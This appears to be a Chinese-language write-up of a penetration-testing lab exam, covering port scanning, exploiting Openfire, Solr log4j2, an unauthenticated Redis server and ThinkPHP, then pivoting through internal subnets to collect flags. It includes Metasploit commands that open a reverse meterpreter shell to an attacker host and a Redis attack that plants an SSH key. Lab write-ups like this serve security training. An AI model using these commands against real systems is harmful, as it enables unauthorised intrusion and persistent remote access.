exam

weekn_kls_exam

写在前面

127.0.0.1假装是dmz

192.168.2.183假装是外网ip

假装内网主机可以出网

不可出网状态下,thinkphp需手动攻击,redis上传公钥也要手动攻击。部分shell的获取需要通过正向连接获取

pp是对proxychains的alias

j8是对java8的alias

攻击机不通90网段

需手动删除路由表

1
sudo route del -net 192.168.90.0 netmask 255.255.255.0 dev br-f9cc65027665

image.png

反连时需恢复路由表

1
sudo route add -net 192.168.90.0 netmask 255.255.255.0 dev br-f9cc65027665

image.png

DMZ信息收集

靶场搭建起来后对靶机进行扫描

1
./kscan -t 127.0.0.1 -p 0-65535

可用端口

1
2
3
http://127.0.0.1:80                                       Port:80,Addr:本机地址,Digest:00\",\"status\":404,\"er,Length:250
http://127.0.0.1:9090                                     Digest:"\r\n<html>\n<head><titl,Length:285,Port:9090,Addr:本机地址,FingerPrint:JSP;JAVA;OpenfireAdminConsole
http://127.0.0.1:8983          SolrAdmin                  Digest:href=\"css/angular/strea,Length:16998,Port:8983,Addr:本机地址,FingerPrint:apacheSolr;JQuery;ApacheSolr,FoundDomain:www.w3.org、www.apache.org、collection.name、currentCollection.name、core.name、currentCore.name、lucene.apache.org、issues.apache.org、webchat.freenode.net、wiki.apache.org

访问一下看看都是些什么

80

空页面没啥东西

9090

image.png

8983

image.png

DMZ漏洞扫描&利用

先梭哈

使用nuclei

1
./nuclei -list ~/exam/port

~/exam/port

1
2
3
http://127.0.0.1:80
http://127.0.0.1:9090
http://127.0.0.1:8983

扫描结果

image.png

spring 80

下载并分析该heapdump

1
j8 -jar JDumpSpider-1.1-SNAPSHOT-full.jar ~/exam/heapdump > ~/exam/heapdump_result

提取可用信息

image.png

java.version = 1.8.0_432

openfire 9090

尝试yakit中扫描漏洞,无果

msf中寻找其相关漏洞

发现rce模块,尝试检查漏洞

image.png

配置好参数,尝试利用

image.png

利用成功

image.png

solr 8983

使用msf扫描log4j2

image.png

发现log4j2

利用

image.png

成功反弹shell,通过webdelivery 上线msf

1
2
3
4
5
6
7
use exploit/multi/script/web_delivery
set target Linux
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.2.183
set SRVPORT 4577
set LPORT 4331
run

image.png

openfire作为入口点进行内网渗透

信息收集

查看网卡信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
meterpreter > ipconfig
Interface  1
============
Name         : eth0 - eth0
Hardware MAC : 46:86:07:b8:b0:96
MTU          : 1500
IPv4 Address : 172.16.238.20
IPv4 Netmask : 255.255.255.0
Interface  2
============
Name         : lo - lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

上传工具进行扫描

1
2
3
4
5
[2025-03-01 06:10:20] [SUCCESS] 端口开放 172.16.238.35:80
[2025-03-01 06:10:20] [SUCCESS] 端口开放 172.16.238.20:7070
[2025-03-01 06:10:20] [SUCCESS] 端口开放 172.16.238.20:7777
[2025-03-01 06:10:20] [SUCCESS] 端口开放 172.16.238.99:8983
[2025-03-01 06:10:20] [SUCCESS] 端口开放 172.16.238.20:9090

过滤重复内容,端口开放信息如下

172.16.238.35:80

172.16.238.20:7070

172.16.238.20:7777

上传代理工具进行代理

image.png

内网漏洞扫描&利用

1
pp ./nuclei -list ~/exam/nuclei_list_172.16.238.0

非常安全,没有漏洞。

7070端口

image.png

和openfire相关的,结束

扫描结束后发现

135为springboot信息泄漏的机器

99为solr机器

20为该主机

solr作入口

信息收集

网卡信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface  2
============
Name         : eth0
Hardware MAC : d6:9e:76:c3:32:ca
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.16.238.99
IPv4 Netmask : 255.255.255.0
Interface  3
============
Name         : eth1
Hardware MAC : fa:f7:c7:eb:07:4d
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.90.4
IPv4 Netmask : 255.255.255.0

上传工具进行扫描

1
2
3
4
5
192.168.90.80:80
192.168.90.45:80
192.168.90.30:22
192.168.90.30:6379
192.168.90.30:9999

代理搭建

image.png

漏洞扫描

1
pp ./nuclei -list ~/exam/nuclei_list_192.168.90.0

不知道nuclei拉了还是代理拉了,没扫到

手动利用

192.168.90.30 redis未授权访问

敏感文件:

image.png

image.png

和spring泄漏的一致

利用

1
pp python redis-attack.py -r 192.168.90.30 -L 192.168.2.183 -P 4889 -a 666666 -lf3 ~/.ssh/id_rsa.pub

上传公钥

1
pp ssh root@192.168.90.30  -i ~/.ssh/id_rsa

image.png

上线到msf

web_delivery

192.168.90.80 thinkphp rce

直接利用rce

image.png

flag

dmz80端口,heapdump泄漏 192.168.90.45:80,172.16.238.35:80

flag{975948af-22da-4dea-a783-c2132f06b287}

dmz9090端口,openfire命令执行漏洞 172.16.238.20:9090

flag{8c6cad22-e797-4295-83d6-e7ab0a0616fa}

dmz8983, solr log4j2反序列化

flag{c072f21d-83a4-48c9-b04a-2f483b13aa86}

192.168.90.30, redis密码泄漏,ssh写公钥

flag{4d664237-4256-4520-af60-421899e7b79c}

192.168.90.80,thinkphp rce

flag{a42d9a3c-1a65-4cd3-9b3b-6b3e549eef03}

shell

image.png{:height 127, :width 749}